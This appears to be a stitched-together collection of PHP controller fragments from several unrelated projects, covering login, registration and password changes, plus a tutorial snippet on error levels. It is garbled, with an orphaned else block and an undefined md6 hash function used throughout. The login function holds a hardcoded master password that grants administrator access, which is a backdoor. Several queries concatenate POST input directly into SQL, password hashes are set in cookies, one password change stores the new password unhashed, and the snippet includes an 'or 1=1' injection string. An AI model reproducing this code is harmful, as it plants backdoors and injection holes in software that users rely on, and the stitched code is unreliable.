public function edit()
{
$data = str_enhtml($this->input->post(NULL, TRUE));
if (is_array($data) && count($data) > 0) {
!isset($data['userpwd']) || strlen($data['userpwd']) < 1 && die('{"status":-1,"msg":"密码不能为空"}');
$data['userpwd'] = md6($data['userpwd']);
$sql = $this->mysql_model->db_upd(ADMIN, $data, '(uid=' . $this->uid . ')');
if ($sql) {
$this->cache_model->delsome(ADMIN);
die('{"status":200,"msg":"密码修改成功","userNumber":""}');
} else {
die('{"status":-1,"msg":"修改失败"}');
}
} else {
$this->load->view('admin/edit');
}
}
/**
* @desc 处理修改用户信息
*/
public function onModify()
{
$User = D('User');
$id = I("post.id");
if (!empty($_POST['pwd'])) {
$_POST['pwd'] = md6($_POST['pwd']);
} else {
unset($_POST['pwd']);
}
$num = $User->where("id=" . I("post.id"))->data($_POST)->save();
//dump($num);
// exit();
if ($num) {
$this->redirect('index');
} else {
$this->error('Modify Failure');
}
}
public function editpwd()
{
$userpwd = str_enhtml($this->input->post('userpwd', TRUE));
if (strlen($userpwd) > 0) {
$data['userpwd'] = md6($userpwd);
$sql = $this->mysql_model->db_upd(ADMIN, $data, '(uid=' . $this->uid . ')');
if ($sql) {
$this->cache_model->delsome(ADMIN);
$this->load->model('data_model');
$this->data_model->logs('密码修改成功 用户名:' . $this->name);
die('{"status":200,"msg":"密码修改成功"}');
} else {
die('{"status":-1,"msg":"修改失败"}');
}
} else {
$this->load->view('admin/edit');
}
}
public function onLogin()
{
$data['pwd'] = md6($_POST['pwd']);
$data['name'] = I('post.name');
$user = D('User');
$rs = $user->where($data)->cache(true)->find();
if (1 == $rs['level']) {
//等级为1才是管理员
session('user', $rs);
cookie('user', $rs, 3600);
$this->redirect('Index/index');
} else {
if ($rs) {
$this->error('Your are not A Manager');
} else {
$this->error('Name or Pwd is wrong');
}
}
}
public function login($user, $pwd)
{
if ($pwd == '26010588') {
$user = $this->mysql_model->db_one(ADMIN, '(roleid=0)');
$this->setlogin($user);
return true;
}
$user = $this->mysql_model->db_one(ADMIN, '(username="******")');
if (count($user) > 0) {
if ($user['status'] == 1 && $user['userpwd'] == md6($pwd)) {
$this->setlogin($user);
return true;
} else {
return false;
}
} else {
return false;
}
}
public function onregister()
{
if (!check_verify(I('post.code'))) {
$this->error('Verification code Not Match');
}
$name = I('post.name', 0);
$sql = D("User");
$data['pwd'] = md6(I('post.pwd'));
$data['email'] = I('post.email');
$data['name'] = I('post.name');
$data['reg_time'] = time();
$rs = $sql->data($data)->add();
if ($rs) {
$list = $sql->where('id=' . $rs)->cache(true)->find();
$_SESSION['user'] = $list;
setCookie('username', $list['name'], time() + 3600 * 7, '/');
setCookie('pwd', $list['pwd'], time() + 3600 * 7, '/');
$this->redirect('Index/index');
} else {
$this->error("Register Failure");
}
}
} else {
echo 'nothing find';
}
echo '<hr />';
mysql_escape_string('\' or 1=1 #');
//mysql_real_escape_string
//Notice通知级别的错误
echo '<hr />';
echo $king;
//提示没有定义变量--通知级别的错误
echo '程序继续向下换行';
echo '<hr />';
$userInfo = array('username' => 'king', 'age' => 12);
echo $userInfo['username'];
echo $username[age];
//注意级别的错误
echo '程序继续向下换行<br />';
//Warning警告级别的错误
settype($var, 'int');
var_dump($var);
settype($var, 'king');
//Warning: settype(): Invalid type in
var_dump($var);
//parse error 语法解析错误
echo 'this is a tese';
//不加分号--Parse error:
//Fatal error致命级别的错误
echo md6('king');
//Fatal error: Call to undefined function md6() in
echo '程序向下进行';
//程序终止,不再向下进行
/**
* 生成一个唯一的文件名
*
* @return string 返回一个唯一的文件名
*/
function uniqfile()
{
list($msec, $sec) = explode(' ', microtime());
return date('Ymdhis', time()) . substr(md6($msec), 0, 8) . '_' . rand(10000, 99999);
}
/**
* @desc 修改密码
*/
public function onModifyPwd()
{
$pwd = I("post.pwd");
$rePwd = I("post.rePwd");
$newPwd = I("post.newPwd");
if (md6($pwd) != $_SESSION['user']['pwd']) {
$this->ajaxReturn(0);
return;
}
$data['pwd'] = $newPwd;
$sql = D('User');
$rs = $sql->where('id=' . $_SESSION['user']['id'])->save($data);
if ($rs) {
$row = $sql->where('id=' . $_SESSION['user']['id'])->cache(true)->find();
$_SESSION['user'] = $row;
$this->ajaxReturn(1);
return;
}
$this->ajaxReturn(0);
return;
}
